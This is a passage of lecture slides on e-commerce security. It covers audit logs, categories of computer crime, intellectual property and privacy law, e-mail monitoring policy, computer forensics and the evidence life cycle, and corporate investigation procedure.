• Enables tracking of history of modifications, deletions, additions.
• Allow for accountability
• Audit logs should record:
– Transaction time and date
– Who processed transaction
– Which terminal was used
– Various security events relating to transaction

Page 139: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Illegal Computer Operations

• Eavesdropping – sniffing, dumpster diving, social engineering
• Fraud – collusion, falsified transactions
• Theft – information or trade secrets, physical hardware and software theft
• Sabotage – Denial of Service (DoS), production delays
• External Attacks – malicious cracking, scanning, war dialing

Page 140: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Outline

• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics

Page 141: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Computer Crimes

• Crimes against the computer

• Crimes using a computer

Page 142: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Most Common Crimes

• Denial of Service (DoS)
• Theft of passwords
• Network Intrusions
• Emanation Eavesdropping
• Social Engineering
• Illegal Content of Material – porn
• Fraud – using a computer to perpetrate crimes, e.g. auctions of non-existent merchandise
• Software Piracy
• Dumpster Diving
• Malicious Code
• Spoofing of IP Addresses
• Information Warfare – attacking infrastructure of a Nation, including military and power grid
• Destruction or alteration of information
• Use of readily available Attack Scripts – Script Kiddies, unskilled users
• Masquerading
• Embezzlement – Illegally acquiring funds
• Data-Diddling – modification of data
• Terrorism

Page 143: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Intellectual Property Law

• Patent – Provides owner legally enforceable right to exclude others for specified time (U.S. 17 years)
• Copyright – Protects original works of authorship, can be used for software and databases
• Trade Secret – Secures confidentiality of proprietary technical and business related information
– Company must meet requirements:
  • Invested resources to develop the information
  • Valuable to the business
  • Valuable to competitor
  • Non-obvious information
• Trademark – establishes word, name, symbol, color or sounds used to identify and distinguish goods

Page 144: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Information Privacy Laws

• Intent varies widely from country to country
• European Union - has developed more protective laws for individual privacy
– Transfer of data from EU to US is prohibited unless equivalent protections are in place

Page 145: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Electronic Monitoring

• Keystroke monitoring, e-mail monitoring, surveillance cameras, badges and magnetic card keys all allow monitoring of individuals.

• Key to monitoring: Must be done in a lawful manner in a consistent fashion

Page 146: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

E-mail monitoring

• Inform users that all e-mail is being monitored by displaying a log-on banner
– Banner should state: logging on to the system consents the user to being monitored. Unauthorized access is prohibited. Subject to prosecution.
• Ensure monitoring is uniformly applied
• Explain acceptable use
• Explain who can read e-mail and how long it is backed up
• No guarantee of privacy

Page 147: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Computer Forensics

• Collecting information from and about computer systems that is admissible in a court of law.

Page 148: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Evidence Life Cycle

• Discovery and recognition
• Protection
• Recording
• Collection
– Collect all relevant storage media
– Make image of hard disk before removing power
– Print out screen
– Avoid degaussing equipment
• Identification (tagging and marking)
• Preservation
– Protect from magnetic erasure
– Store in proper environment
• Transportation
• Presentation in court
• Return to evidence owner

Page 149: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Conducting the Investigation

• Corporate investigation should include Management, corporate security, Human Resources, legal department and other appropriate staff.
• Committee should be set up beforehand to address the following issues:
– Establishing liaison with law enforcement
– Deciding when and if to bring in law enforcement (FBI and Secret Service)
– Setting up means of reporting computer crimes
– Establishing procedures for handling reports of computer crimes
– Planning and conducting investigations
– Involving senior management and corporate security, Human Resources, the legal dept.
– Ensuring proper collection of evidence

Page 150: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Good Sources of Evidence

• Telephone records
• Video cameras
• Audit trails
• System logs
• System backups
• Witnesses
• Results of surveillance
• E-mails

Page 151: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

MOM

• Motive

• Opportunity

• Means

Page 152: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Interview

• If interviewing do not give information away to suspect

• Questions should be scripted

• Don’t use original documents in the interview

Page 153: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Questions?